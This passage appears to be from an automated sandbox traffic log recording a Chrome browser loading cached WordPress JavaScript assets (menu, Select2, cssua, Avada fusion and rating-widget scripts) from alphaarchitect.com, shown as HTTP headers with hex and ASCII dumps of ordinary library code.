                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0888964219-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC878INData Raw: 35 37 31 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2d 6d 65 6e 75 2d 77 69 64 67 65 74 20 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 2c 20 2e 66 75 73 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2d 6d 65 6e 75 2d 77 69 64 67 65 74 20 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 6e 3d 65 2e 70 61 72 65 6e 74 28 29 3b 65 2e 66 69 6e 64 28 22 2e 63 68 69 6c 64 72 65 6e 2c 20 2e 73 75 62 2d 6d 65 6e 75 22 29 2e 6c 65 6e 67 74 68 26 26 65 2e 66 69 6e 64 28 22 2e 63 68 69 6c 64 72 65 6e 2c 20 2e 73 75
                                                                                                                                                                                                                                                                        Data Ascii: 571jQuery(document).ready(function(){jQuery(".fusion-vertical-menu-widget .current_page_item, .fusion-vertical-menu-widget .current-menu-item").each(function(){var e=jQuery(this),n=e.parent();e.find(".children, .sub-menu").length&&e.find(".children, .su
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC522INData Raw: 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 7d 29 2c 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2d 6d 65 6e 75 2d 77 69 64 67 65 74 2e 68 6f 76 65 72 20 6c 69 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 68 6f 76 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 22 3e 20 2e 63 68 69 6c 64 72 65 6e 2c 20 3e 20 2e 73 75 62 2d 6d 65 6e 75 22 29 3b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 2c 65 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                        Data Ascii: item-has-children.current-menu-item").length)return!1}),jQuery(".fusion-vertical-menu-widget.hover li").each(function(){var e;jQuery(this).hover(function(){var n=jQuery(this).find("> .children, > .sub-menu");clearTimeout(e),e=setTimeout(function(){n.lengt
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        91192.168.2.449849141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC612OUTGET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/select2/i18n/en.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-34a"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba08cbed41cf-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC849INData Raw: 33 34 61 0d 0a 2f 2a 21 20 53 65 6c 65 63 74 32 20 34 2e 30 2e 31 33 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 65 6c 65 63 74 32 2f 73 65 6c 65 63 74 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 2e 6d 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6a 51 75 65 72 79 26 26 6a 51 75 65 72 79 2e 66 6e 26 26 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 26 26 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 2e 61 6d 64 29 76 61 72 20 65 3d 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 2e 61 6d 64 3b 65 2e 64 65 66 69 6e 65 28 22 73 65 6c 65 63 74 32 2f 69 31 38 6e 2f 65 6e 22 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 65 72 72 6f 72 4c 6f 61 64 69 6e 67 3a 66 75 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: 34a/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */!function(){if(jQuery&&jQuery.fn&&jQuery.fn.select2&&jQuery.fn.select2.amd)var e=jQuery.fn.select2.amd;e.define("select2/i18n/en",[],function(){return{errorLoading:func
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        92192.168.2.449850141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC828OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-d0f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba092d7542d8-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC878INData Raw: 64 30 66 0d 0a 76 61 72 20 63 73 73 75 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 73 3d 22 20 75 61 2d 22 2c 72 3d 2f 5c 73 2a 28 5b 5c 2d 5c 77 20 5d 2b 29 5b 5c 73 5c 2f 5c 3a 5d 28 5b 5c 64 5f 5d 2b 5c 62 28 3f 3a 5b 5c 2d 5c 2e 5f 5c 2f 5d 5c 77 2b 29 2a 29 2f 2c 6e 3d 2f 28 5b 5c 77 5c 2d 5c 2e 5d 2b 5b 5c 73 5c 2f 5d 5b 76 5d 3f 5b 5c 64 5f 5d 2b 5c 62 28 3f 3a 5b 5c 2d 5c 2e 5f 5c 2f 5d 5c 77 2b 29 2a 29 2f 67 2c 61 3d 2f 5c 62 28 3f 3a 28 62 6c 61 63 6b 62 65 72 72 79 5c 77 2a 7c 62 62 31 30 29 7c 28 72 69 6d 20 74 61 62 6c 65 74 20 6f 73 29 29 28 3f 3a 5c 2f 28 5c 64 2b 5c 2e 5c 64 2b 28 3f 3a 5c 2e 5c 77 2b 29 2a 29 29 3f 2f 2c 62 3d 2f 5c 62 73 69 6c 6b 2d 61 63 63 65 6c 65 72 61 74
                                                                                                                                                                                                                                                                        Data Ascii: d0fvar cssua=function(e,o,i){"use strict";var s=" ua-",r=/\s*([\-\w ]+)[\s\/\:]([\d_]+\b(?:[\-\._\/]\w+)*)/,n=/([\w\-\.]+[\s\/][v]?[\d_]+\b(?:[\-\._\/]\w+)*)/g,a=/\b(?:(blackberry\w*|bb10)|(rim tablet os))(?:\/(\d+\.\d+(?:\.\w+)*))?/,b=/\bsilk-accelerat
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 78 70 2e 24 31 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 5f 22 29 2c 76 3d 52 65 67 45 78 70 2e 24 32 3b 28 21 69 5b 66 5d 7c 7c 70 61 72 73 65 46 6c 6f 61 74 28 69 5b 66 5d 29 3c 70 61 72 73 65 46 6c 6f 61 74 28 76 29 29 26 26 28 69 5b 66 5d 3d 76 29 7d 7d 65 6c 73 65 7b 76 61 72 20 78 3d 6d 5b 77 5d 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 78 29 66 6f 72 28 73 3d 30 2c 64 3d 78 2e 6c 65 6e 67 74 68 3b 73 3c 64 3b 73 2b 2b 29 7b 76 61 72 20 67 3d 78 5b 73 5d 2e 73 70 6c 69 74 28 2f 5b 5c 2f 5c 73 5d 2b 2f 29 3b 67 2e 6c 65 6e 67 74 68 26 26 22 6d 6f 7a 69 6c 6c 61 22 21 3d 3d 67 5b 30 5d 26 26 28 69 5b 67 5b 30 5d 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 5f 22 29 5d 3d 67 2e 73 6c 69 63 65 28 31 29 2e 6a 6f 69 6e 28 22 2d 22 29 29
                                                                                                                                                                                                                                                                        Data Ascii: xp.$1.split(" ").join("_"),v=RegExp.$2;(!i[f]||parseFloat(i[f])<parseFloat(v))&&(i[f]=v)}}else{var x=m[w].match(n);if(x)for(s=0,d=x.length;s<d;s++){var g=x[s].split(/[\/\s]+/);g.length&&"mozilla"!==g[0]&&(i[g[0].split(" ").join("_")]=g.slice(1).join("-"))
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1103INData Raw: 73 61 66 61 72 69 2c 31 30 29 5d 7c 7c 69 2e 73 61 66 61 72 69 29 29 3a 69 2e 6d 73 69 65 7c 7c 69 2e 74 72 69 64 65 6e 74 3f 28 69 2e 6f 70 65 72 61 7c 7c 28 69 2e 69 65 3d 69 2e 6d 73 69 65 7c 7c 69 2e 72 76 29 2c 64 65 6c 65 74 65 20 69 2e 6d 73 69 65 2c 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 5f 6f 73 3f 28 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 3d 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 5f 6f 73 2c 64 65 6c 65 74 65 20 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 5f 6f 73 29 3a 22 77 70 64 65 73 6b 74 6f 70 22 21 3d 3d 69 2e 6d 6f 62 69 6c 65 26 26 22 78 62 6c 77 70 37 22 21 3d 3d 69 2e 6d 6f 62 69 6c 65 26 26 22 7a 75 6e 65 77 70 37 22 21 3d 3d 69 2e 6d 6f 62 69 6c 65 7c 7c 28 69 2e 6d 6f 62 69 6c 65 3d 22 77 69 6e 64 6f 77 73 20 64
                                                                                                                                                                                                                                                                        Data Ascii: safari,10)]||i.safari)):i.msie||i.trident?(i.opera||(i.ie=i.msie||i.rv),delete i.msie,i.windows_phone_os?(i.windows_phone=i.windows_phone_os,delete i.windows_phone_os):"wpdesktop"!==i.mobile&&"xblwp7"!==i.mobile&&"zunewp7"!==i.mobile||(i.mobile="windows d
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        93192.168.2.449851141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC829OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1280"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0b5bd54345-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC877INData Raw: 31 32 38 30 0d 0a 76 61 72 20 66 75 73 69 6f 6e 3d 7b 66 75 73 69 6f 6e 52 65 73 69 7a 65 57 69 64 74 68 3a 30 2c 66 75 73 69 6f 6e 52 65 73 69 7a 65 48 65 69 67 68 74 3a 30 2c 63 75 72 72 65 6e 74 50 6f 73 74 49 44 3a 6e 75 6c 6c 2c 74 6f 42 6f 6f 6c 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 74 7c 7c 22 31 22 3d 3d 3d 74 7c 7c 21 30 3d 3d 3d 74 7c 7c 22 74 72 75 65 22 3d 3d 3d 74 7c 7c 22 6f 6e 22 3d 3d 3d 74 7d 2c 72 65 73 74 41 72 67 75 6d 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 6e 75 6c 6c 3d 3d 65 3f 74 2e 6c 65 6e 67 74 68 2d 31 3a 2b 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 2c 69 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: 1280var fusion={fusionResizeWidth:0,fusionResizeHeight:0,currentPostID:null,toBool:function(t){return 1===t||"1"===t||!0===t||"true"===t||"on"===t},restArguments:function(t,e){return e=null==e?t.length-1:+e,function(){for(var n,i=Math.max(arguments.leng
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 73 6d 61 6c 6c 2b 22 70 78 29 22 29 7d 2c 69 73 4d 65 64 69 75 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 22 2b 28 70 61 72 73 65 49 6e 74 28 66 75 73 69 6f 6e 4a 53 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 73 6d 61 6c 6c 29 2b 31 29 2b 22 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 22 2b 70 61 72 73 65 49 6e 74 28 66 75 73 69 6f 6e 4a 53 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 6d 65 64 69 75 6d 29 2b 22 70 78 29 22 29 7d 2c 69 73 4c 61 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22
                                                                                                                                                                                                                                                                        Data Ascii: Vars.visibility_small+"px)")},isMedium:function(){return Modernizr.mq("only screen and (min-width:"+(parseInt(fusionJSVars.visibility_small)+1)+"px) and (max-width:"+parseInt(fusionJSVars.visibility_medium)+"px)")},isLarge:function(){return Modernizr.mq("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 65 3d 74 3a 76 6f 69 64 20 30 21 3d 3d 74 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 6f 66 66 73 65 74 22 29 26 26 28 65 3d 74 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 6f 66 66 73 65 74 22 29 29 2c 22 74 6f 70 2d 6d 69 64 2d 6f 66 2d 76 69 65 77 22 3d 3d 3d 65 3f 69 3d 22 30 70 78 20 30 70 78 20 2d 35 30 25 20 30 70 78 22 3a 22 62 6f 74 74 6f 6d 2d 69 6e 2d 76 69 65 77 22 3d 3d 3d 65 26 26 28 6e 3d 5b 30 2c 2e 32 2c 2e 34 2c 2e 36 2c 2e 37 2c 2e 38 2c 2e 39 2c 31 5d 29 2c 7b 72 6f 6f 74 3a 6e 75 6c 6c 2c 72 6f 6f 74 4d 61 72 67 69 6e 3a 69 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 7d 7d 2c 73 68 6f 75 6c 64 4f 62 73 65 72 76 65 72 45 6e 74 72 79 41 6e 69 6d 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: string"==typeof t?e=t:void 0!==t.data("animationoffset")&&(e=t.data("animationoffset")),"top-mid-of-view"===e?i="0px 0px -50% 0px":"bottom-in-view"===e&&(n=[0,.2,.4,.6,.7,.8,.9,1]),{root:null,rootMargin:i,threshold:n}},shouldObserverEntryAnimate:function(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1129INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 5b 6e 5d 29 26 26 65 2e 70 75 73 68 28 74 5b 6e 5d 29 7d 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 29 2c 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 65 29 29 2c 65 29 3a 5b 5d 7d 2c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 7c 7c 28 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 3d 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 45 6c 65 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                        Data Ascii: nction(n){Element.prototype.isPrototypeOf(t[n])&&e.push(t[n])}):"string"==typeof t&&(e=document.querySelectorAll(t),e=Array.prototype.slice.call(e)),e):[]},Element.prototype.matches||(Element.prototype.matches=Element.prototype.msMatchesSelector||Element.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        94192.168.2.449852141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC585OUTGET /wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.6.0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-238f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0c1e914384-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC877INData Raw: 32 33 38 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 72 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 6c 66 3d 69 28 74 68 69 73 29 2c 72 2e 64 65 73 74 72 6f 79 2e 63 61 6c 6c 28 74 68 69 73 2e 73 65 6c 66 29 2c 74 68 69 73 2e 6f 70 74 3d 69 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 69 2e 66 6e 2e 75 6d 5f 72 61 74 79 2e 64 65 66 61 75 6c 74 73 2c 74 29 2c 72 2e 5f 61 64 6a 75 73 74 43 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 74 68 69 73 29 2c 72 2e 5f 61 64 6a 75 73 74 4e 75 6d 62 65 72 2e 63 61 6c 6c 28 74 68 69 73 29 2c 22 69 6d 67 22 21 3d 3d 74 68 69 73 2e 6f 70 74 2e 73 74 61 72 54 79 70 65 26 26 72 2e 5f 61 64 6a 75 73
